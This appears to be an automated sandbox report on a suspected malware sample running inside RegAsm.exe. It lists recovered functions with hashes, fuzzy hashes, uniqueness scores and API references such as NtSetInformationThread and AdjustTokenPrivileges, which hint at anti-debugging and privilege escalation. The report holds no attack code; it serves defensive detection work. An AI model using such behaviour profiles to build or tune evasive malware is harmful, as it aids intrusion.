Opcode ID: 40ea3d713da07ca8e9b5b8076b878d0956f77306e0653de1a3d4fa521703f5f5
Instruction ID: 259bca4c8337c74aba37b2193d64ad9db1d6249f48c4d5be2e8906e942e2cc75
Opcode Fuzzy Hash: 40ea3d713da07ca8e9b5b8076b878d0956f77306e0653de1a3d4fa521703f5f5
Instruction Fuzzy Hash: 15E10470A04201CBC309DB78CA54A1DBBA6AF90705F19866EE5069F6EACF3BDD45C781

Uniqueness

Uniqueness Score: 0.05%

Function 22DE2578, Relevance: 1.8, APIs: 1, Instructions: 298libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 22DE25BC

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 164faf47e8ade36ccc139ae3d3d9ca74d6f056ebacff1688a8944448eab5d7fa
Instruction ID: 349ac41d74dafad98ac8a4a462e1bb3971caa66e2abdc6b2f2648426e38e5426
Opcode Fuzzy Hash: 164faf47e8ade36ccc139ae3d3d9ca74d6f056ebacff1688a8944448eab5d7fa
Instruction Fuzzy Hash: 8FC16C74E10309CBDB08DFA4C999B9EB7F6BF94314F508929D40AAB394DBB49D41CB90

Uniqueness

Uniqueness Score: 0.02%

Function 22DE1320, Relevance: 1.7, Strings: 1, Instructions: 424UNIQUE

Download Yara Rule

Strings

`<s, xrefs: 22DE1799

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID: `<s
API String ID: 0-3648492335
Opcode ID: 7c71b3c01ad9dc6fa021dabf84505f75894842564ad2fae5ad72bf41335a73c1
Instruction ID: c5f9f0ee7c7142c1b8de3d69796ad77682ea7bb867bdfb1c7e8ba64589645c33
Opcode Fuzzy Hash: 7c71b3c01ad9dc6fa021dabf84505f75894842564ad2fae5ad72bf41335a73c1
Instruction Fuzzy Hash: D8F14F30F14319CBDB68CBB8C950B5EB7B6BF84244F108569D80AEB365DA35DE42CB91

Uniqueness

Uniqueness Score: 100.00%

Function 0112AEBC, Relevance: 1.7, APIs: 1, Instructions: 159nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: fce93402a226ff6116652b7ba2b6a9155a1d6342eb10803b3d2ac62887a2ca91
Instruction ID: a955666ba4878971f6784f08b2ffaf7b8547ebf564ec9d15ee57c7a5fe77f5e0
Opcode Fuzzy Hash: fce93402a226ff6116652b7ba2b6a9155a1d6342eb10803b3d2ac62887a2ca91
Instruction Fuzzy Hash: 5841F4E290EBF1CDDF2F962844A87593FA15BB3201F9A52D8C4534F856D3684060DBB7

Uniqueness

Uniqueness Score: 0.05%

Function 22DE1311, Relevance: 1.6, Strings: 1, Instructions: 388UNIQUE

Download Yara Rule

Strings

`<s, xrefs: 22DE1799

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID: `<s
API String ID: 0-3648492335
Opcode ID: 570fa6fbdba1940695de8f33a00999d50d62959b694de43ad950938ac20e756e
Instruction ID: 94d7c7c4a324bcd864c5c01920762080e2ebf5ec7e521a394bd65545dbdf6f51
Opcode Fuzzy Hash: 570fa6fbdba1940695de8f33a00999d50d62959b694de43ad950938ac20e756e
Instruction Fuzzy Hash: 30E16230F143198BDB28CBB8C950B5EB7B6BF84245F10856DD40AEB3A4DA35DE46CB91

Uniqueness

Uniqueness Score: 100.00%

Function 0112AD50, Relevance: 1.6, APIs: 1, Instructions: 138nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 18e83be831f382c2927adcb64c692c484e445b057e9baf7effb8c0d7c3a78f56
Instruction ID: 4e44ed4e850fe57b5108ad719f09212c7b3a6ff55c75f1344346c2aa2b2a6f40
Opcode Fuzzy Hash: 18e83be831f382c2927adcb64c692c484e445b057e9baf7effb8c0d7c3a78f56
Instruction Fuzzy Hash: 9841C2E190D7B1CDDF2F5628909872D2BA1AF63301F5B52D9C4134F856D36844B0CBAB

Uniqueness

Uniqueness Score: 0.05%

Function 0112AD94, Relevance: 1.6, APIs: 1, Instructions: 138nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: e57ead409481b767f4a5c0fe38a5fa08dcff007dbaa37b7d7419954fa6bd8082
Instruction ID: 87f1b81fdd23d33232ea1ae06c827fa786a0e13bde49deb8c88b0a068154ed8a
Opcode Fuzzy Hash: e57ead409481b767f4a5c0fe38a5fa08dcff007dbaa37b7d7419954fa6bd8082
Instruction Fuzzy Hash: 3A41BFE190D7B1CDDF2F9A2890987292BA1AF63301F5B52D9C0534F856D36844B0CBAB

Uniqueness

Uniqueness Score: 0.05%

Function 0112ADDC, Relevance: 1.6, APIs: 1, Instructions: 135nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: a608f541d500517d42d9395393aa390d5285b2a95fedd96ae57c0f74d65da112
Instruction ID: 8637ecf24f40b32d5557efe171d95836bec210d1c82d3461eace3b7d0acb789b
Opcode Fuzzy Hash: a608f541d500517d42d9395393aa390d5285b2a95fedd96ae57c0f74d65da112
Instruction Fuzzy Hash: 6F419FE190D7B1CDDF2F9A2894987292BA1AF63301F5A52D8C4534F856D36844A0CBAB

Uniqueness

Uniqueness Score: 0.05%

Function 0112AE25, Relevance: 1.6, APIs: 1, Instructions: 132nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: b5a1219effb05dbcb5c9127240fc6afc37e422b1ead8bbff444b161d9efca342
Instruction ID: 9c606c084f223eb41bb71370bf1dc3cd92638cf11eec3c19790cc14b31f9ca9a
Opcode Fuzzy Hash: b5a1219effb05dbcb5c9127240fc6afc37e422b1ead8bbff444b161d9efca342
Instruction Fuzzy Hash: 4E419FE190DBB1CDDF2F962884987293BA1AF63301F5B52D9C4534F856D36844B0CBAB

Uniqueness

Uniqueness Score: 0.05%

Function 0112AE74, Relevance: 1.6, APIs: 1, Instructions: 127nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 7a28063678b6f68f5fba30487c5836710e935e46315e7a8bbb6564acbedcfe24
Instruction ID: 7a7096cbd0466015788f21a4c34926d7ed79134d0079f0773f5eb91c6faa81fa
Opcode Fuzzy Hash: 7a28063678b6f68f5fba30487c5836710e935e46315e7a8bbb6564acbedcfe24
Instruction Fuzzy Hash: FA4183E190D7B1CDDF2F9A28849872D3BA1AB63301F5B52D9C1534F456D36844B0CBAB

Uniqueness

Uniqueness Score: 0.05%

Function 0112AD34, Relevance: 1.6, APIs: 1, Instructions: 122nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 8402b2475eae643f03c478fd3222486650049952b5e73970125d7e183e91c8b3
Instruction ID: 0794fda56eaf5ff6ea768bd4ee3cc23934be6df4c76e0606113ebc98ad7d5ac3
Opcode Fuzzy Hash: 8402b2475eae643f03c478fd3222486650049952b5e73970125d7e183e91c8b3
Instruction Fuzzy Hash: 0031077160C636CEEB2E4A28E48477C7762FF45314F2B5666C9138B591D33884F4879B

Uniqueness

Uniqueness Score: 0.05%

Function 22DE1E39, Relevance: 1.6, Strings: 1, Instructions: 365UNIQUE

Download Yara Rule

Strings

`<s, xrefs: 22DE202D

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID: `<s
API String ID: 0-3648492335
Opcode ID: 919350ea1667c8d6199fe12cc5ce6bf4617a0a67406088171187f0d6649796ad
Instruction ID: e9d1dd2ce088e89ead6a5d371398ee11870986f4b356192c020bc231bee2bdec
Opcode Fuzzy Hash: 919350ea1667c8d6199fe12cc5ce6bf4617a0a67406088171187f0d6649796ad
Instruction Fuzzy Hash: 5AD15130B103098BEB18DBB4C954B5EB7B6AF84344F20852DD90AEB399DB75DD06CB81

Uniqueness

Uniqueness Score: 100.00%

Function 0112AF55, Relevance: 1.6, APIs: 1, Instructions: 115nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: cc2a421207e60d5ee1b4125ffc0b096d7cc3ddf72fc6ed98ccb86a6cd1f7d95c
Instruction ID: 74a897d08e983e7b6975263807adf6cb1b800b069061082df5de61afec7dcfda
Opcode Fuzzy Hash: cc2a421207e60d5ee1b4125ffc0b096d7cc3ddf72fc6ed98ccb86a6cd1f7d95c
Instruction Fuzzy Hash: 9C3182E190DBB1CDDF2F962884987693BA1AB63301F5B52D9C0534F456D36840B0CBAB

Uniqueness

Uniqueness Score: 0.05%

Function 0112AF99, Relevance: 1.6, APIs: 1, Instructions: 113nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: e7c0edab6791850bcbe1d50278c869b522bae9a616a2ca6afea14473cfd26088
Instruction ID: 0fe2051fb44f69a27327a7718a6c40b382c66bc88a6c45abd95b3da87f7724a8
Opcode Fuzzy Hash: e7c0edab6791850bcbe1d50278c869b522bae9a616a2ca6afea14473cfd26088
Instruction Fuzzy Hash: C63162A190DBB1CDDF2F962884987693BA1AB63311F5B52D9C0534F456D36840B0CBAB

Uniqueness

Uniqueness Score: 0.05%

Function 0112AFDD, Relevance: 1.6, APIs: 1, Instructions: 111nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: fab41d7bac63b02f80435b86291e9fc22092206f1e343c3180f1762fc0bd0150
Instruction ID: 266d454026d867136f0cb5dc7cffa175ab7ca09819a02afde08ca6ab09bcd793
Opcode Fuzzy Hash: fab41d7bac63b02f80435b86291e9fc22092206f1e343c3180f1762fc0bd0150
Instruction Fuzzy Hash: B53163E190DBF1CDDF2F962884987693BA1AB63311F5B52D9C0534F456D36840B0CBAB

Uniqueness

Uniqueness Score: 0.05%

Function 0112B025, Relevance: 1.6, APIs: 1, Instructions: 107nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: e673cbd2f137941ac37e7eba2cb3c9dfa4166db26bfb3d570a31c9914502d54f
Instruction ID: e76b52e70bb474e1b6e398fdb557e005881963a014b15a0ce5bcfce3d18cce10
Opcode Fuzzy Hash: e673cbd2f137941ac37e7eba2cb3c9dfa4166db26bfb3d570a31c9914502d54f
Instruction Fuzzy Hash: 3C312FE190DBB1CDDF2F962880987693BA0AB63311F9B52D9C1534F456D36840B0DBAB

Uniqueness

Uniqueness Score: 0.05%

Function 22DE1E48, Relevance: 1.6, Strings: 1, Instructions: 354UNIQUE

Download Yara Rule

Strings

`<s, xrefs: 22DE202D

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID: `<s
API String ID: 0-3648492335
Opcode ID: 76be0ea11698369a8e6b942412353274febc7310a8f90cff83d2bdf7498c6684
Instruction ID: 0d037088a1f41d37a6eb45b1bc0248e4121ace9d9344f97ee1a257eda820e6b4
Opcode Fuzzy Hash: 76be0ea11698369a8e6b942412353274febc7310a8f90cff83d2bdf7498c6684
Instruction Fuzzy Hash: EFD14130B103098BEB58DBB8C954B5EB7F6AF84344F20852DD90AEB395DA75DD06CB81

Uniqueness

Uniqueness Score: 100.00%

Function 22DE0139, Relevance: 1.6, Strings: 1, Instructions: 353UNIQUE

Download Yara Rule

Strings

njMN, xrefs: 22DE039B

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID: njMN
API String ID: 0-1800293381
Opcode ID: e5c013a5c1861f6a62776fc37cf47be775c6cfff55b541557eff1b7aa84a4ee0
Instruction ID: 7b4d455d52e910e8e88e96909414e1a90f07705b775bcfd499f9c0fa70a67ce2
Opcode Fuzzy Hash: e5c013a5c1861f6a62776fc37cf47be775c6cfff55b541557eff1b7aa84a4ee0
Instruction Fuzzy Hash: D6D1C030B103098FDB54CBA8C994B5DB3A2FF84311F54CA2AE91AEB399DA35DC45CB51

Uniqueness

Uniqueness Score: 100.00%

Function 0112B074, Relevance: 1.6, APIs: 1, Instructions: 103nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: ddec62d1af3dd43661940a2fb879b245c902ee6a8e6dc8fc96cf9f41b2720382
Instruction ID: 5a3504ac1aaad1956effb63253a81485596992f70a22fa5067a314ff08f9e22f
Opcode Fuzzy Hash: ddec62d1af3dd43661940a2fb879b245c902ee6a8e6dc8fc96cf9f41b2720382
Instruction Fuzzy Hash: E8312FE190E7B1CDDF2F962880987693BA19B63311F9B52D9C0534F456D36840E0DBAB

Uniqueness

Uniqueness Score: 0.05%

Function 0112B0CC, Relevance: 1.6, APIs: 1, Instructions: 97nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: db18f301fdc81b8cead35720d199b0be5c7178aadde40b28b0cdaf0615791ee8
Instruction ID: 24c3c357a776eca0778d15a57c373dfd23e4918f85d73c7403db78153cdacc22
Opcode Fuzzy Hash: db18f301fdc81b8cead35720d199b0be5c7178aadde40b28b0cdaf0615791ee8
Instruction Fuzzy Hash: 53314FE190EBB1CDDF2F962880987293FA05B63311F8B52C9C0534E456D36840F0DBA7

Uniqueness

Uniqueness Score: 0.05%

Function 22DE0C00, Relevance: 1.6, Strings: 1, Instructions: 345UNIQUE

Download Yara Rule

Strings

\\$, xrefs: 22DE1118

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID: \\$
API String ID: 0-1693720619
Opcode ID: 3eaa81fcc77187a62d45acafeb0a4d0e6e5b257d6c791498b0665f2bb548b3fa
Instruction ID: 67d3d9ffa9b7b556c6a3e1da1d8b4235cf80f5d05ef0890cc5b0d9b95f98d4ac
Opcode Fuzzy Hash: 3eaa81fcc77187a62d45acafeb0a4d0e6e5b257d6c791498b0665f2bb548b3fa
Instruction Fuzzy Hash: 57D17F75F002098BDB08DBA8C990A5DB7E6FF84300F55C629D80AEB3A5DB35ED51CB91

Uniqueness

Uniqueness Score: 100.00%

Function 0112B11C, Relevance: 1.6, APIs: 1, Instructions: 91nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 128009fb6ea58b6fee0d2ee32c4215fbb405d24f5037983fe07c68ec1d7715c9
Instruction ID: a75d4c555c6b9d4696c9ac8f9528589860a1a2b832e6a433cfc0eaece822be39
Opcode Fuzzy Hash: 128009fb6ea58b6fee0d2ee32c4215fbb405d24f5037983fe07c68ec1d7715c9
Instruction Fuzzy Hash: 12211DE190E7B1CDDF2F962880983293FA05B63311F8B52D9C0434F456D36840E0DBAB

Uniqueness

Uniqueness Score: 0.05%

Function 0112B170, Relevance: 1.6, APIs: 1, Instructions: 88nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 24b144d52ca2a1887a3fd5c2ac3531f6da6b728b1c332ae45ee2682ddad99062
Instruction ID: 1c53d8e0deb2e44a1e2a6b42a41dea3f026676a669ff9de16118eb1122483fde
Opcode Fuzzy Hash: 24b144d52ca2a1887a3fd5c2ac3531f6da6b728b1c332ae45ee2682ddad99062
Instruction Fuzzy Hash: 9B21DCE190EBF1CDDF2F962880987292FA05B73212F8B52D9C0534F856D36844A4DBA7

Uniqueness

Uniqueness Score: 0.05%

Function 0112B1BC, Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 58207c24cc1744917f7c42afc50b97192c8c6fffaa280e871df05cd909895957
Instruction ID: aa8ce2c6bf27b12c28f05898763d978799116b022b08b59a6769f6c921649e92
Opcode Fuzzy Hash: 58207c24cc1744917f7c42afc50b97192c8c6fffaa280e871df05cd909895957
Instruction Fuzzy Hash: B121CFE290E7F1CCDF3FA62840987692FA15B73211F8B52D9C4534F856D36840A4DBAB

Uniqueness

Uniqueness Score: 0.05%

Function 22CF3113, Relevance: 1.6, Strings: 1, Instructions: 328UNIQUE

Download Yara Rule

Strings

<, xrefs: 22CF36F6

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-3994965447
Opcode ID: 5a874877b40d2aab4f931cbf24f2a4e409c500d3a3bbee891a3e2d23bba9e427
Instruction ID: bbc7a96dcf9d63b5dfae2df6d93ac0dc983e9b8312f2e62280f6e4b41959d66e
Opcode Fuzzy Hash: 5a874877b40d2aab4f931cbf24f2a4e409c500d3a3bbee891a3e2d23bba9e427
Instruction Fuzzy Hash: 94E12B74A00219CFDB65CF28C994B9AB7F2BF88310F1086E6D909A7351DB35AE95CF50

Uniqueness

Uniqueness Score: 100.00%

Function 0112B21D, Relevance: 1.6, APIs: 1, Instructions: 77nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 0153acf8dfb0124cd2c1776c85e63a9958a15e556d55289bcc4a12f7f79d2ea5
Instruction ID: 693a662997118e90c83b0c99d68140035aeda2b9c34a82c195a3b8ffce1c0111
Opcode Fuzzy Hash: 0153acf8dfb0124cd2c1776c85e63a9958a15e556d55289bcc4a12f7f79d2ea5
Instruction Fuzzy Hash: 012191E290EBF1CCDF3FA62840987652F615AB3201B8B02D9C5534F816D36841A4D7B7

Uniqueness

Uniqueness Score: 0.05%

Function 1FD2B1AF, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1FD2B22F

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 7446c46a891ea33bd28794f127171a4d201f31301c00173cb9fd2da63ad4a708
Instruction ID: 977de61c7362e3375cbcb9e9cdb35a02691d1a4f88d7fc4243eec331d35f5736
Opcode Fuzzy Hash: 7446c46a891ea33bd28794f127171a4d201f31301c00173cb9fd2da63ad4a708
Instruction Fuzzy Hash: AA21BF765093849FDB128F25DC40B52BFF4EF06314F0885DAE9848F263D370A908DBA2

Uniqueness

Uniqueness Score: 0.25%

Function 0112B284, Relevance: 1.6, APIs: 1, Instructions: 69nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: da0cb8e5fb745fb1f5683c281644a7848efd4315a9580047dfbabbc1a0e5ac60
Instruction ID: d9532f83fb125e55deb05aef2fddef2ee35c103fb6528de8ccc324af2f0ddc84
Opcode Fuzzy Hash: da0cb8e5fb745fb1f5683c281644a7848efd4315a9580047dfbabbc1a0e5ac60
Instruction Fuzzy Hash: 641190D2A0EBF1CC9F3FA62850E83662F6559B310178F42D9C5934F81AE2580470DBB7

Uniqueness

Uniqueness Score: 0.05%

Function 0112B2D0, Relevance: 1.6, APIs: 1, Instructions: 63nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: cb8da7bfd651d442b08195360e64eeaa2148eabb4eef692790e6242d2651ba75
Instruction ID: 6f49e2fb62b3bd10d771292bb38bfdce6a1fdb2212b61e4027534506a96aedf8
Opcode Fuzzy Hash: cb8da7bfd651d442b08195360e64eeaa2148eabb4eef692790e6242d2651ba75
Instruction Fuzzy Hash: F31150D290EBF1CC9F2FA62840E83662F6559B310278F42D8C5530E81AE2580064DBB7

Uniqueness

Uniqueness Score: 0.05%

Function 0112B321, Relevance: 1.6, APIs: 1, Instructions: 60nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?,?,000000C0,?,?,00000000,?,0112001C), ref: 0112B380

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 550cc9757937b37fb665ba01301bd6109b81c98dd1cc6048ee3c2ee1225d21b4
Instruction ID: 4dec5a82705f62d66be3fc03eeb5bfeaf2a68acc46404a345033e7d290e104d0
Opcode Fuzzy Hash: 550cc9757937b37fb665ba01301bd6109b81c98dd1cc6048ee3c2ee1225d21b4
Instruction Fuzzy Hash: 140131D290EBF1C89F3BA62840E83562FA55DB710278B42C8C5934E80AE1980174DBB7

Uniqueness

Uniqueness Score: 0.05%

Function 1FD2B331, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 1FD2B39D

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: e3ba1ba7a1ed54f465220dca95352b0db59ac085820280eb84a3209337de6a13
Instruction ID: 9a54718ec17c93ccdb727e82ed121659cea07298a20757c57fb6f79b1d1ab592
Opcode Fuzzy Hash: e3ba1ba7a1ed54f465220dca95352b0db59ac085820280eb84a3209337de6a13
Instruction Fuzzy Hash: B4118E725093C09FD7128B14DC85A52FFB4EF06324F0984DAE9848F263D265A918DB72

Uniqueness

Uniqueness Score: 0.01%

